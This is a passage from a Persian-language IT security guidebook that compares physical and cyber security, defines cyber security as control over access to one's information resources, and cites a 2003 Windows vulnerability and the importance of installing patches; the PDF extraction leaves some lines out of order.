ﻣﻲﺗﻮﺍﻧﻴﻢ ﺭﻭﻱ ﻣﻨﺎﻃﻘﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﺍﺣﺘﻤﺎﻝ ﻧﻔﻮﺫ ﻣـﻲﺭﻭﺩ
ﻧﻮﺭ ﻛﺎﻓﻲ ﻣﺘﻤﺮﻛﺰ ﻛﻨﻴﻢ .ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﻜﻪ ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﻣﻲﺗﻮﺍﻥ ﺑﺎ
ﺍﻳــﻦ ﻓــﺮﺽ ﻛــﻪ ﺍﻗــﺪﺍﻣﺎﺕ ﻧﻔــﻮﺫﻱ ﺍﻭﻟﻴــﻪ ﻣﻮﻓــﻖ ﺑﺎﺷــﻨﺪ ﺍﺯ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﻭ ﻣﺤﺎﻓﻈﻬﺎﻱ ﻗﻮﻳﺘﺮ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻛﺴﺎﻧﻴﻜﻪ ﻣﻮﻓﻖ ﺑﻪ ﻧﻔﻮﺫ ﺷﺪﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ .ﻣﻬﻤﺘـﺮ
ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﻭ ﺟﺰﺍﻳﻲ ﻭ
ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻧﻴﺰ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻚ ﻧﻤﺎﻳﻴﻢ.
ﻻ ﺍﺯ ﭼﻨﺪﻳﻦ ﺭﻭﺵ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﺧـﻮﺩ
ﻣﺎ ﻣﻌﻤﻮ ﹰ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ ﺗﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻜﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﻧـﺸﺪ
ﺩﻳﮕﺮﻱ ﺧﻼﺀ ﺁﻧﺮﺍ ﭘﺮ ﻛﻨﺪ .ﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﻛﻠﻴﺪﻫﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺖ ﻭ
ﻞ ﺩﺭ ﺍﺯ ﺁﻥ ﭘﺲ ﺣﻔﺎﻅ ﻣﻄﻤﺌﻨﻲ ﺑﻪ ﺷﻤﺎﺭ ﻧﻤﻲﺭﻓﺖ ،ﻣﻲﺗﻮﺍﻥ
ﻗﻔ ﹺ
ﺍﺯ ﻋﻼﺋﻢ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺍﻋﻼﻡ ﺧﻄـﺮ ﻧﻔـﻮﺫ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ.
ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﻣﺮﺯﻫﺎ ﻭ ﻋﻮﺍﻣﻞ ﺳﺪﻛﻨﻨﺪﻩ ﺑﻪ ﺍﺭﺯﺵ ﭼﻴﺰﻱ ﻛﻪ ﻣـﻮﺭﺩ
ﺣﻔﺎﻇﺖ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻭ ﺍﻧﺘﻈـﺎﺭﺍﺕ ﻣﻌﻘﻮﻻﻧـﻪﺍﻱ ﻛـﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ
ﺣﻤﻠﻪ ﺑﻪ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ.
ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻭ ﺭﻭﺷـﻬﺎﻱ ﺣﻔـﺎﻇﺘﻲ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺑـﻪ
ﺷﻜﻠﻲ ﺩﻳﮕﺮ ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﺎ ﺑﻪ ﺁﻥ ﺍﻧـﺪﺍﺯﻩ ﻛـﻪ ﺑـﺎ ﺗـﺪﺍﺑﻴﺮ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ ﺑﺎ ﻣﺎﻫﻴﺖ ﺁﻧﻬـﺎ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﺁﺷﻨﺎ ﻧﻴﺴﺘﻴﻢ ،ﺍﻣﺎ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﻢ ﻭ ﺩﺭﺻـﻮﺭﺕ
ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ،ﺭﻭﺵ ﻛـﺎﺭﺑﺮﺩ ﺁﻧﻬـﺎ ﺭﺍ
ﺑﺪﺍﻧﻴﻢ .ﻫﻢ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻭ ﻭ ﻫﻢ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ
ﺣﻔﺎﻇﺖ ﻭ ﺩﻓﺎﻉ ﺍﺯ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺩﻳﮕﺮﺍﻥ ﻭ
ﺩﺭﺻــﻮﺭﺕ ﻣﻮﻓﻘﻴــﺖﺁﻣﻴــﺰ ﺑــﻮﺩﻥ ﺣﻤــﻼﺕ ،ﺑــﺎﺯﭘﺲﮔﻴــﺮﻱ
ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻪ ﻣﻲﺑﺎﺷﻴﻢ.
٣٣
ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺩﺭ ﻋﻮﺽ ﻣﺎ ﺗﻌﺮﻳﻒ ﺯﻳـﺮ ﺭﺍ ﭘﻴـﺸﻨﻬﺎﺩ ﻣـﻲﻛﻨـﻴﻢ :ﻫﻨﮕـﺎﻣﻲ ﺩﺭ
ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﻳﻤﻦ ﻫﺴﺘﻴﺪ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ
ﺷﻤﺎ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺧﻮﺩﺗﺎﻥ ﺑﺎﺷﺪ ،ﻳﻌﻨﻲ ﻫﻴﭻ ﻛﺲ ﺑﺪﻭﻥ ﻛـﺴﺐ
ﺍﺟﺎﺯﻩ ﺍﺯ ﺟﺎﻧﺐ ﺷﻤﺎ ﻗﺎﺩﺭ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻦ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ
ﻧﺒﺎﺷﺪ .ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫـﺎ ﻭ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﻪﺍﻱ ،ﺷـﺒﻜﻪﺍﻱ،
ﺗﺮﺍﻛﻨﺸﻲ ،ﭘﺮﺩﺍﺯﺷﻲ ،ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺑﺎﺷﻨﺪ .ﻃﺒﻴﻌﺘﹰﺎ ﻣﻤﻜﻦ ﺍﺳﺖ
ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺍﺯ ﺟﺎﻧﺐ ﺩﻳﮕﺮﺍﻥ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﺍﺭﺍﺋـﻪ
ﺷﺪﻩ ﺑﺎﺷﻨﺪ ،ﻣﺜﻞ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ٢٥ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺍﺷـﺘﺮﺍﻛﻲ ﻳـﺎ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ
ﻼ ﺍﻳﻤـﻦ ﻧﻴـﺴﺘﻨﺪ،
) .٢٦(ISPﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻫﻴﭽﮕﺎﻩ ﻛـﺎﻣ ﹰ
ﺗﻨﻬﺎ ﺗﺎ ﻭﻗﺘﻴﻜﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻓﺮﻭﺷﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﺓ
ﺻﺤﻴﺢ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑـﺮ ﺩﺳﺘﺮﺳـﻲ ﻣـﺪﺍﻭﻡ ﻭ
ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳﺐ ﺍﺯ ﺧﺪﻣﺎﺕ ﺍﺷﺮﺍﻑ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﻣﺜﺎﻟﻲ ﺩﺭ ﻣﻮﺭﺩ ﻣﺎﻫﻴﺖ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﺭﺍﺋـﻪ ﻣـﻲﺷـﻮﺩ.
ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﻘﺼﻲ ﻛﻪ )ﺗﺎ ﭘﻴﺶ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ(
ﺩﺭ ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Microsoft Windowsﻳﺎﻓﺘﻪ ﺷـﺪﻩ
ﻣﻲﭘﺮﺩﺍﺯﻳﻢ:
ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﻛﻪ ﺗﻮﺳﻂ ﭘﮋﻭﻫﺸﮕﺮﺍﻧﻲ ﺍﺯ ﻛـﺸﻮﺭ ﻟﻬـﺴﺘﺎﻥ ﻛـﺸﻒ
ﺷﺪ ﻧﺴﺨﻪﻫﺎﻱ ﺭﺍﻳﺞ Windowsﺩﺭ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺧـﺎﻧﮕﻲ ﺭﺍ
ﻧﻴــﺰ ﺗﺤــﺖ ﺗــﺄﺛﻴﺮ ﻗــﺮﺍﺭ ﺩﺍﺩ" :ﺍﻳــﻦ ﻣــﻮﺭﺩ ﻳﻜــﻲ ﺍﺯ ﺑــﺪﺗﺮﻳﻦ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ Windowsﺍﺳﺖ ﻛﻪ ﺗﺎ ﻛﻨﻮﻥ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ"،
ﺍﻳﻦ ﮔﻔﺘـﺔ ﻣـﺎﺭﻙ ﻣـﺎﻳﻔﺮﺕ ٢٩ﻣـﺪﻳﺮ ﺍﺟﺮﺍﻳـﻲ ﻣﺆﺳـﺴﺔ ﺍﻣﻨﻴـﺖ
ﺩﻳﺠﻴﺘﺎﻝ ﭼﺸﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ٣٠ﻭﺍﻗﻊ ﺩﺭ ﺁﻟﻴﺴﻮ ﻭﻳﻪ ﺟﻮ ٣١ﺩﺭ ﺍﻳﺎﻟﺖ
ﻛﺎﻟﻴﻔﺮﻧﻴﺎﺳــﺖ ﻛــﻪ ﻣﺤﻘﻘــﺎﻥ ﺁﻥ ﻧﻈﻴــﺮ ﻫﻤــﻴﻦ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ
ﺧﻄﺮﻧﺎﻙ ﺭﺍ ﺩﺭ ﺳﻪ ﻧﺴﺨﺔ ﻗﺒﻠﻲ Windowsﻛﺸﻒ ﻛـﺮﺩﻩﺍﻧـﺪ.
ﻣﺎﻳﻔﺮﺕ ﺩﺭﺑﺎﺭﺓ ﺷﺮﻛﺘﻬﺎﻱ ﺁﺳﻴﺐﺩﻳﺪﻩ ﻋﻨﻮﺍﻥ ﻛﺮﺩ" :ﺗـﺎ ﺯﻣﺎﻧﻴﻜـﻪ
ﺁﻧﻬﺎ ﺍﻳﻦ ﻭﺻﻠﺔ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺭﺍ ﻧﺼﺐ ﻧﻜﻨﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﻣﺜـﻞ
ﻳﻚ ﺗﻜﻪ ﭘﻨﻴﺮ ﺳﻮﺋﻴﺴﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻭ ﻫﺮﻛﺲ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺮﺍﺣﺘـﻲ
ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺁﻧﻬﺎ ﻭﺍﺭﺩ ﺷﻮﺩ".
ﺍﻣﺎ ﻫﻤـﺎﻥ ﺯﻣـﺎﻥ ﭼﻬـﺎﺭ ﭘﮋﻭﻫـﺸﮕﺮ ﻟﻬـﺴﺘﺎﻧﻲ ﻛـﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ
""Last Stage of Delirium Research Group
ﺷﻨﺎﺧﺘﻪ ﻣـﻲﺷـﺪﻧﺪ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺭﺍﻫـﻲ ﺑـﺮﺍﻱ ﻋﺒـﻮﺭ ﺍﺯ
ﻭﺻﻠﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻣﻲﺩﺍﻧﻨﺪ ﻭ ﺍﻳﻦ ﺯﻣـﺎﻧﻲ ﺑـﻮﺩ ﻛـﻪ
ﺗﻨﻬﺎ ﺳﻪ ﻣـﺎﻩ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻭﺻـﻠﻪﻫـﺎ ﻣـﻲﮔﺬﺷـﺖ .ﻫﺮﭼﻨـﺪ
ﭘﮋﻭﻫـــﺸﮕﺮﺍﻥ ﻟﻬـــﺴﺘﺎﻧﻲ ﺍﺑـــﺰﺍﺭﻱ ﺑـــﺮﺍﻱ ﺍﺛﺒـــﺎﺕ ﻭﺟـــﻮﺩ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻱﺗﺮ ﻃﺮﺍﺣﻲ ﻛﺮﺩﻩ ﻭ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑـﻪ
ﭼﻨﺪ ﺭﺍﻳﺎﻧﻪ ﻧﻔﻮﺫ ﻛﺮﺩﻧﺪ ،ﻭﻟﻲ ﻣﺘﻌﻬﺪ ﺷﺪﻧﺪ ﻛﻪ ﻫﻴﭻ ﺍﺛﺮﻱ ﺍﺯ ﺍﻳـﻦ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑﺠـﺎﻱ ﻧﮕﺬﺍﺭﻧـﺪ .ﺑﻌـﻀﻲ ﺍﺯ
ﻣﺘﺨﺼﺼﺎﻥ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻃﻲ ﭼﻨﺪ ﻣﺎﻩ ﺁﻳﻨـﺪﻩ ﺍﺯ
ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺣﺘـﻲ
ﺑﺪﻭﻥ ﺍﻋﻼﻡ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﺳـﻮﻱ ﺁﻥ ﭘﮋﻭﻫـﺸﮕﺮﺍﻥ ،ﻧﻔـﻮﺫﮔﺮﺍﻥ
٣٢
ﻧﻮﻋﹰﺎ ﻗﺎﺩﺭ ﺑﻪ ﻋﺒﻮﺭ ﺍﺯ ﻭﺻﻠﻪﻫﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻫﺴﺘﻨﺪ".
"ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺗﻘﺮﻳﺒــﹰﺎ ﺩﺭ ﺗﻤــﺎﻣﻲ ﻧــﺴﺨﻪﻫــﺎﻱ ﻣﻮﺟــﻮﺩ ﺍﺯ
ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎﻱ Windowsﺧﻮﺩ ﻳﻚ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ٢٧ﺑـﺴﻴﺎﺭ
ﻣﻬﻢ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ﻛﻪ ﺍﻭﻟﻴﻦ ﺗﺄﺛﻴﺮ ﺁﻥ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﻛـﺎﺭ ﺍﻓﺘـﺎﺩﻥ
ﻛﺎﻣــﻞ Microsoft Windows Server 2003ﺑﺎﺷــﺪ.
ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﮔﻔﺘﻪ ﻛﻪ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﻣﻲﺗﻮﺍﻧﺪ ﻧﻔﻮﺫﮔﺮﻫـﺎ ﺭﺍ
ﻗــﺎﺩﺭ ﻛﻨــﺪ ﻛــﻪ ﺍﺯ ﻃﺮﻳــﻖ ﺍﻳﻨﺘﺮﻧــﺖ ﻛﻨﺘــﺮﻝ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ
Windowsﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻗﺮﺑﺎﻧﻴــﺎﻥ ﺧــﻮﺩ ﺭﺍ ﺑﺪﺳــﺖ ﮔﺮﻓﺘــﻪ،
ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺪﺯﺩﻧﺪ ،ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺣﺬﻑ ﻛﻨﻨـﺪ ﻭ ﻳـﺎ ﺍﺯ ﻃﺮﻳـﻖ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻨﺪ .ﺍﻳﻦ ﺷﺮﻛﺖ ﺑﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ
ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺍﺩ ﻛـﻪ ﺑﻼﻓﺎﺻــﻠﻪ ﻳـﻚ ﻭﺻــﻠﻪ ٢٨ﺭﺍﻳﮕـﺎﻥ ﺑـﺮﺍﻱ
ﻫﻤﺎﻧﻨﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺩﺭﻭﻥ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ،ﻣـﺎ ﻫـﻴﭻ
ﻛﻨﺘﺮﻟﻲ ﺭﻭﻱ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻧﻈﻴـﺮ Windowsﻧـﺪﺍﺭﻳﻢ.
ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺴﻴﺎﺭ ﻣﻬـﻢ ﺍﺳـﺖ ﻛـﻪ
ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺸﺎﻥ ﺍﻳﻤﻦ ﻭ ﻋﺎﺭﻱ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺧﻄﺎ ﺑﺎﺷﺪ ،ﺍﻣـﺎ ﺯﻣـﺎﻧﻲ
ﻛﻪ ﭼﻨﻴﻦ ﻣﺸﻜﻼﺗﻲ ﺑﺮﻭﺯ ﻣﻲﻛﻨﻨﺪ ﺑﺎ ﺍﺗﺨﺎﺫ ﺗﺪﺍﺑﻴﺮ ﻭ ﺗـﺼﻤﻴﻤﺎﺕ
ﻣﻨﺎﺳﺐ ﻣﻲ ﺗﻮﺍﻧﻴﻢ ﻧﺴﺒﺖ ﺑﻪ ﺗﻬﻴﻪ ﻭ ﻧﺼﺐ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻﻼﺣﻲ
25
26
27
28
29
30
31
32
User Account
Internet Service Provider
Vulnerability
Patch
Marc Maiffret
eEye Digital Security Inc
Aliso Viejo
Ted Bridis, Associated Press July 16.2003.
ﺑﺨﺶ ﺍﻭﻝ
ﺗﻌﺎﺭﻳﻒ ﻭ ﺗﻮﺿﻴﺤﺎﺗﻲ ﻛﻪ ﺩﺭ ﻓﺮﻫﻨﮕﻬـﺎﻱ ﻟﻐـﺎﺕ ﻭ ﻭﺍﮊﻩﻧﺎﻣـﻪﻫـﺎ
ﺑﺮﺍﻱ ﻭﺍﮊﺓ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﻪ ﻣـﻮﺍﺭﺩﻱ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺎ
ﺳﻼﻣﺘﻲ ﻣﺮﺗﺒﻂ ﻫﺴﺘﻨﺪ ،ﻧﻈﻴﺮ "ﻛﻴﻔﻴﺖ ﻳـﺎ ﺣـﺎﻟﺘﻲ ﺍﺯ ﺍﻃﻤﻴﻨـﺎﻥ،
ﺁﺯﺍﺩﻱ ﺍﺯ ﺧﻄﺮ ﻭ ﺭﻫـﺎﻳﻲ ﺍﺯ ﺗـﺮﺱ ﻳـﺎ ﺍﺿـﻄﺮﺍﺏ" .ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ
ﻫﻴﭽﻴﻚ ﺍﺯ ﺍﻳﻦ ﺗﻌﺎﺭﻳﻒ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﻮﺻﻴﻒ ﺩﻗﻴﻖ ﺍﻣﻨﻴـﺖ
ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻜﺎﺭ ﺭﻭﻧﺪ.
ﺑﺮﻃﺮﻑ ﺳﺎﺧﺘﻦ ﺍﻳﻦ ﺍﺷـﻜﺎﻝ ﺭﻭﻱ ﭘﺎﻳــﮕﺎﻩ ﻭﺏ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ
ﻗﺮﺍﺭﺩﻫﺪ "....
٣٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻗﺪﺍﻡ ﻛﻨﻴﻢ ﻭ ﺍﻳﻦ ﺗﻨﻬﺎ ﺭﻭﺵ ﻣﻘﺎﺑﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﻢ.
ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﭼﻄـﻮﺭ ﺑﺎﻳـﺪ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ
ﺧــﻮﺩ ﺣﻔﺎﻇــﺖ ﻧﻤــﺎﻳﻴﻢ ﻭ ﻫﻤﭽﻨــﻴﻦ ﻣــﻲﺩﺍﻧــﻴﻢ ﻛــﻪ ﺑﻌــﻀﻲ ﺍﺯ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻛـﺮﺩ ﻭ ﺑﺮﺧـﻲ ﺍﺯ
ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩﺍﻧﻪ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ .ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ
ﺩﺭﻫﺎﻱ ﺩﻓﺎﺗﺮ ﻭ ﻛﻤﺪﻫﺎﻱ ﺣﺎﻭﻱ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻗﻔﻞ ﻣﻲﻛﻨﻴﻢ ﻭ ﺣﺘـﻲ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻬـﻢ ﺭﺍ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤـﻞ
ﺍﺩﺍﺭﻩ ﻧﮕﻬﺪﺍﺭﻳﻢ ﺗﺎ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﭼﻮﻥ ﺑﺮﻭﺯ ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﻳﺎ ﺳـﺎﻳﺮ
ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ﺍﺯ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﻢ .ﺑﻌﻀﻲ ﺍﻃﻼﻋﺎﺕ ﺭﺍ
ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ ﻭ ﺑـﺴﺘﻪ ﺑـﻪ
ﺩﺭﺟﺔ ﺍﻫﻤﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﻓـﺮﺍﺩ ﻣﺨﺘﻠـﻒ ﺩﺭ ﺳـﻄﻮﺡ
ﻣﺘﻔﺎﻭﺗﻲ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ.
ﺍﺯ ﻧﻈــﺮ ﻣﻔﻬــﻮﻣﻲ ﻣﻴــﺎﻥ ﻣﺎﻫﻴــﺖ ﺗﻬﺪﻳــﺪﺍﺕ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﻭ
ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻫﻴﭻ ﺗﻔﺎﻭﺗﻲ ﻧﻴـﺴﺖ،
ﺑﻠﻜﻪ ﺗﻔﺎﻭﺕ ﺍﻳـﻦ ﺩﻭ ﻣﻘﻮﻟـﻪ ﺑﺮﺧﺎﺳـﺘﻪ ﺍﺯ ﺧـﺼﻮﺻﻴﺎﺕ ﻓـﻀﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻦ ﺣﻮﺯﻩ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ
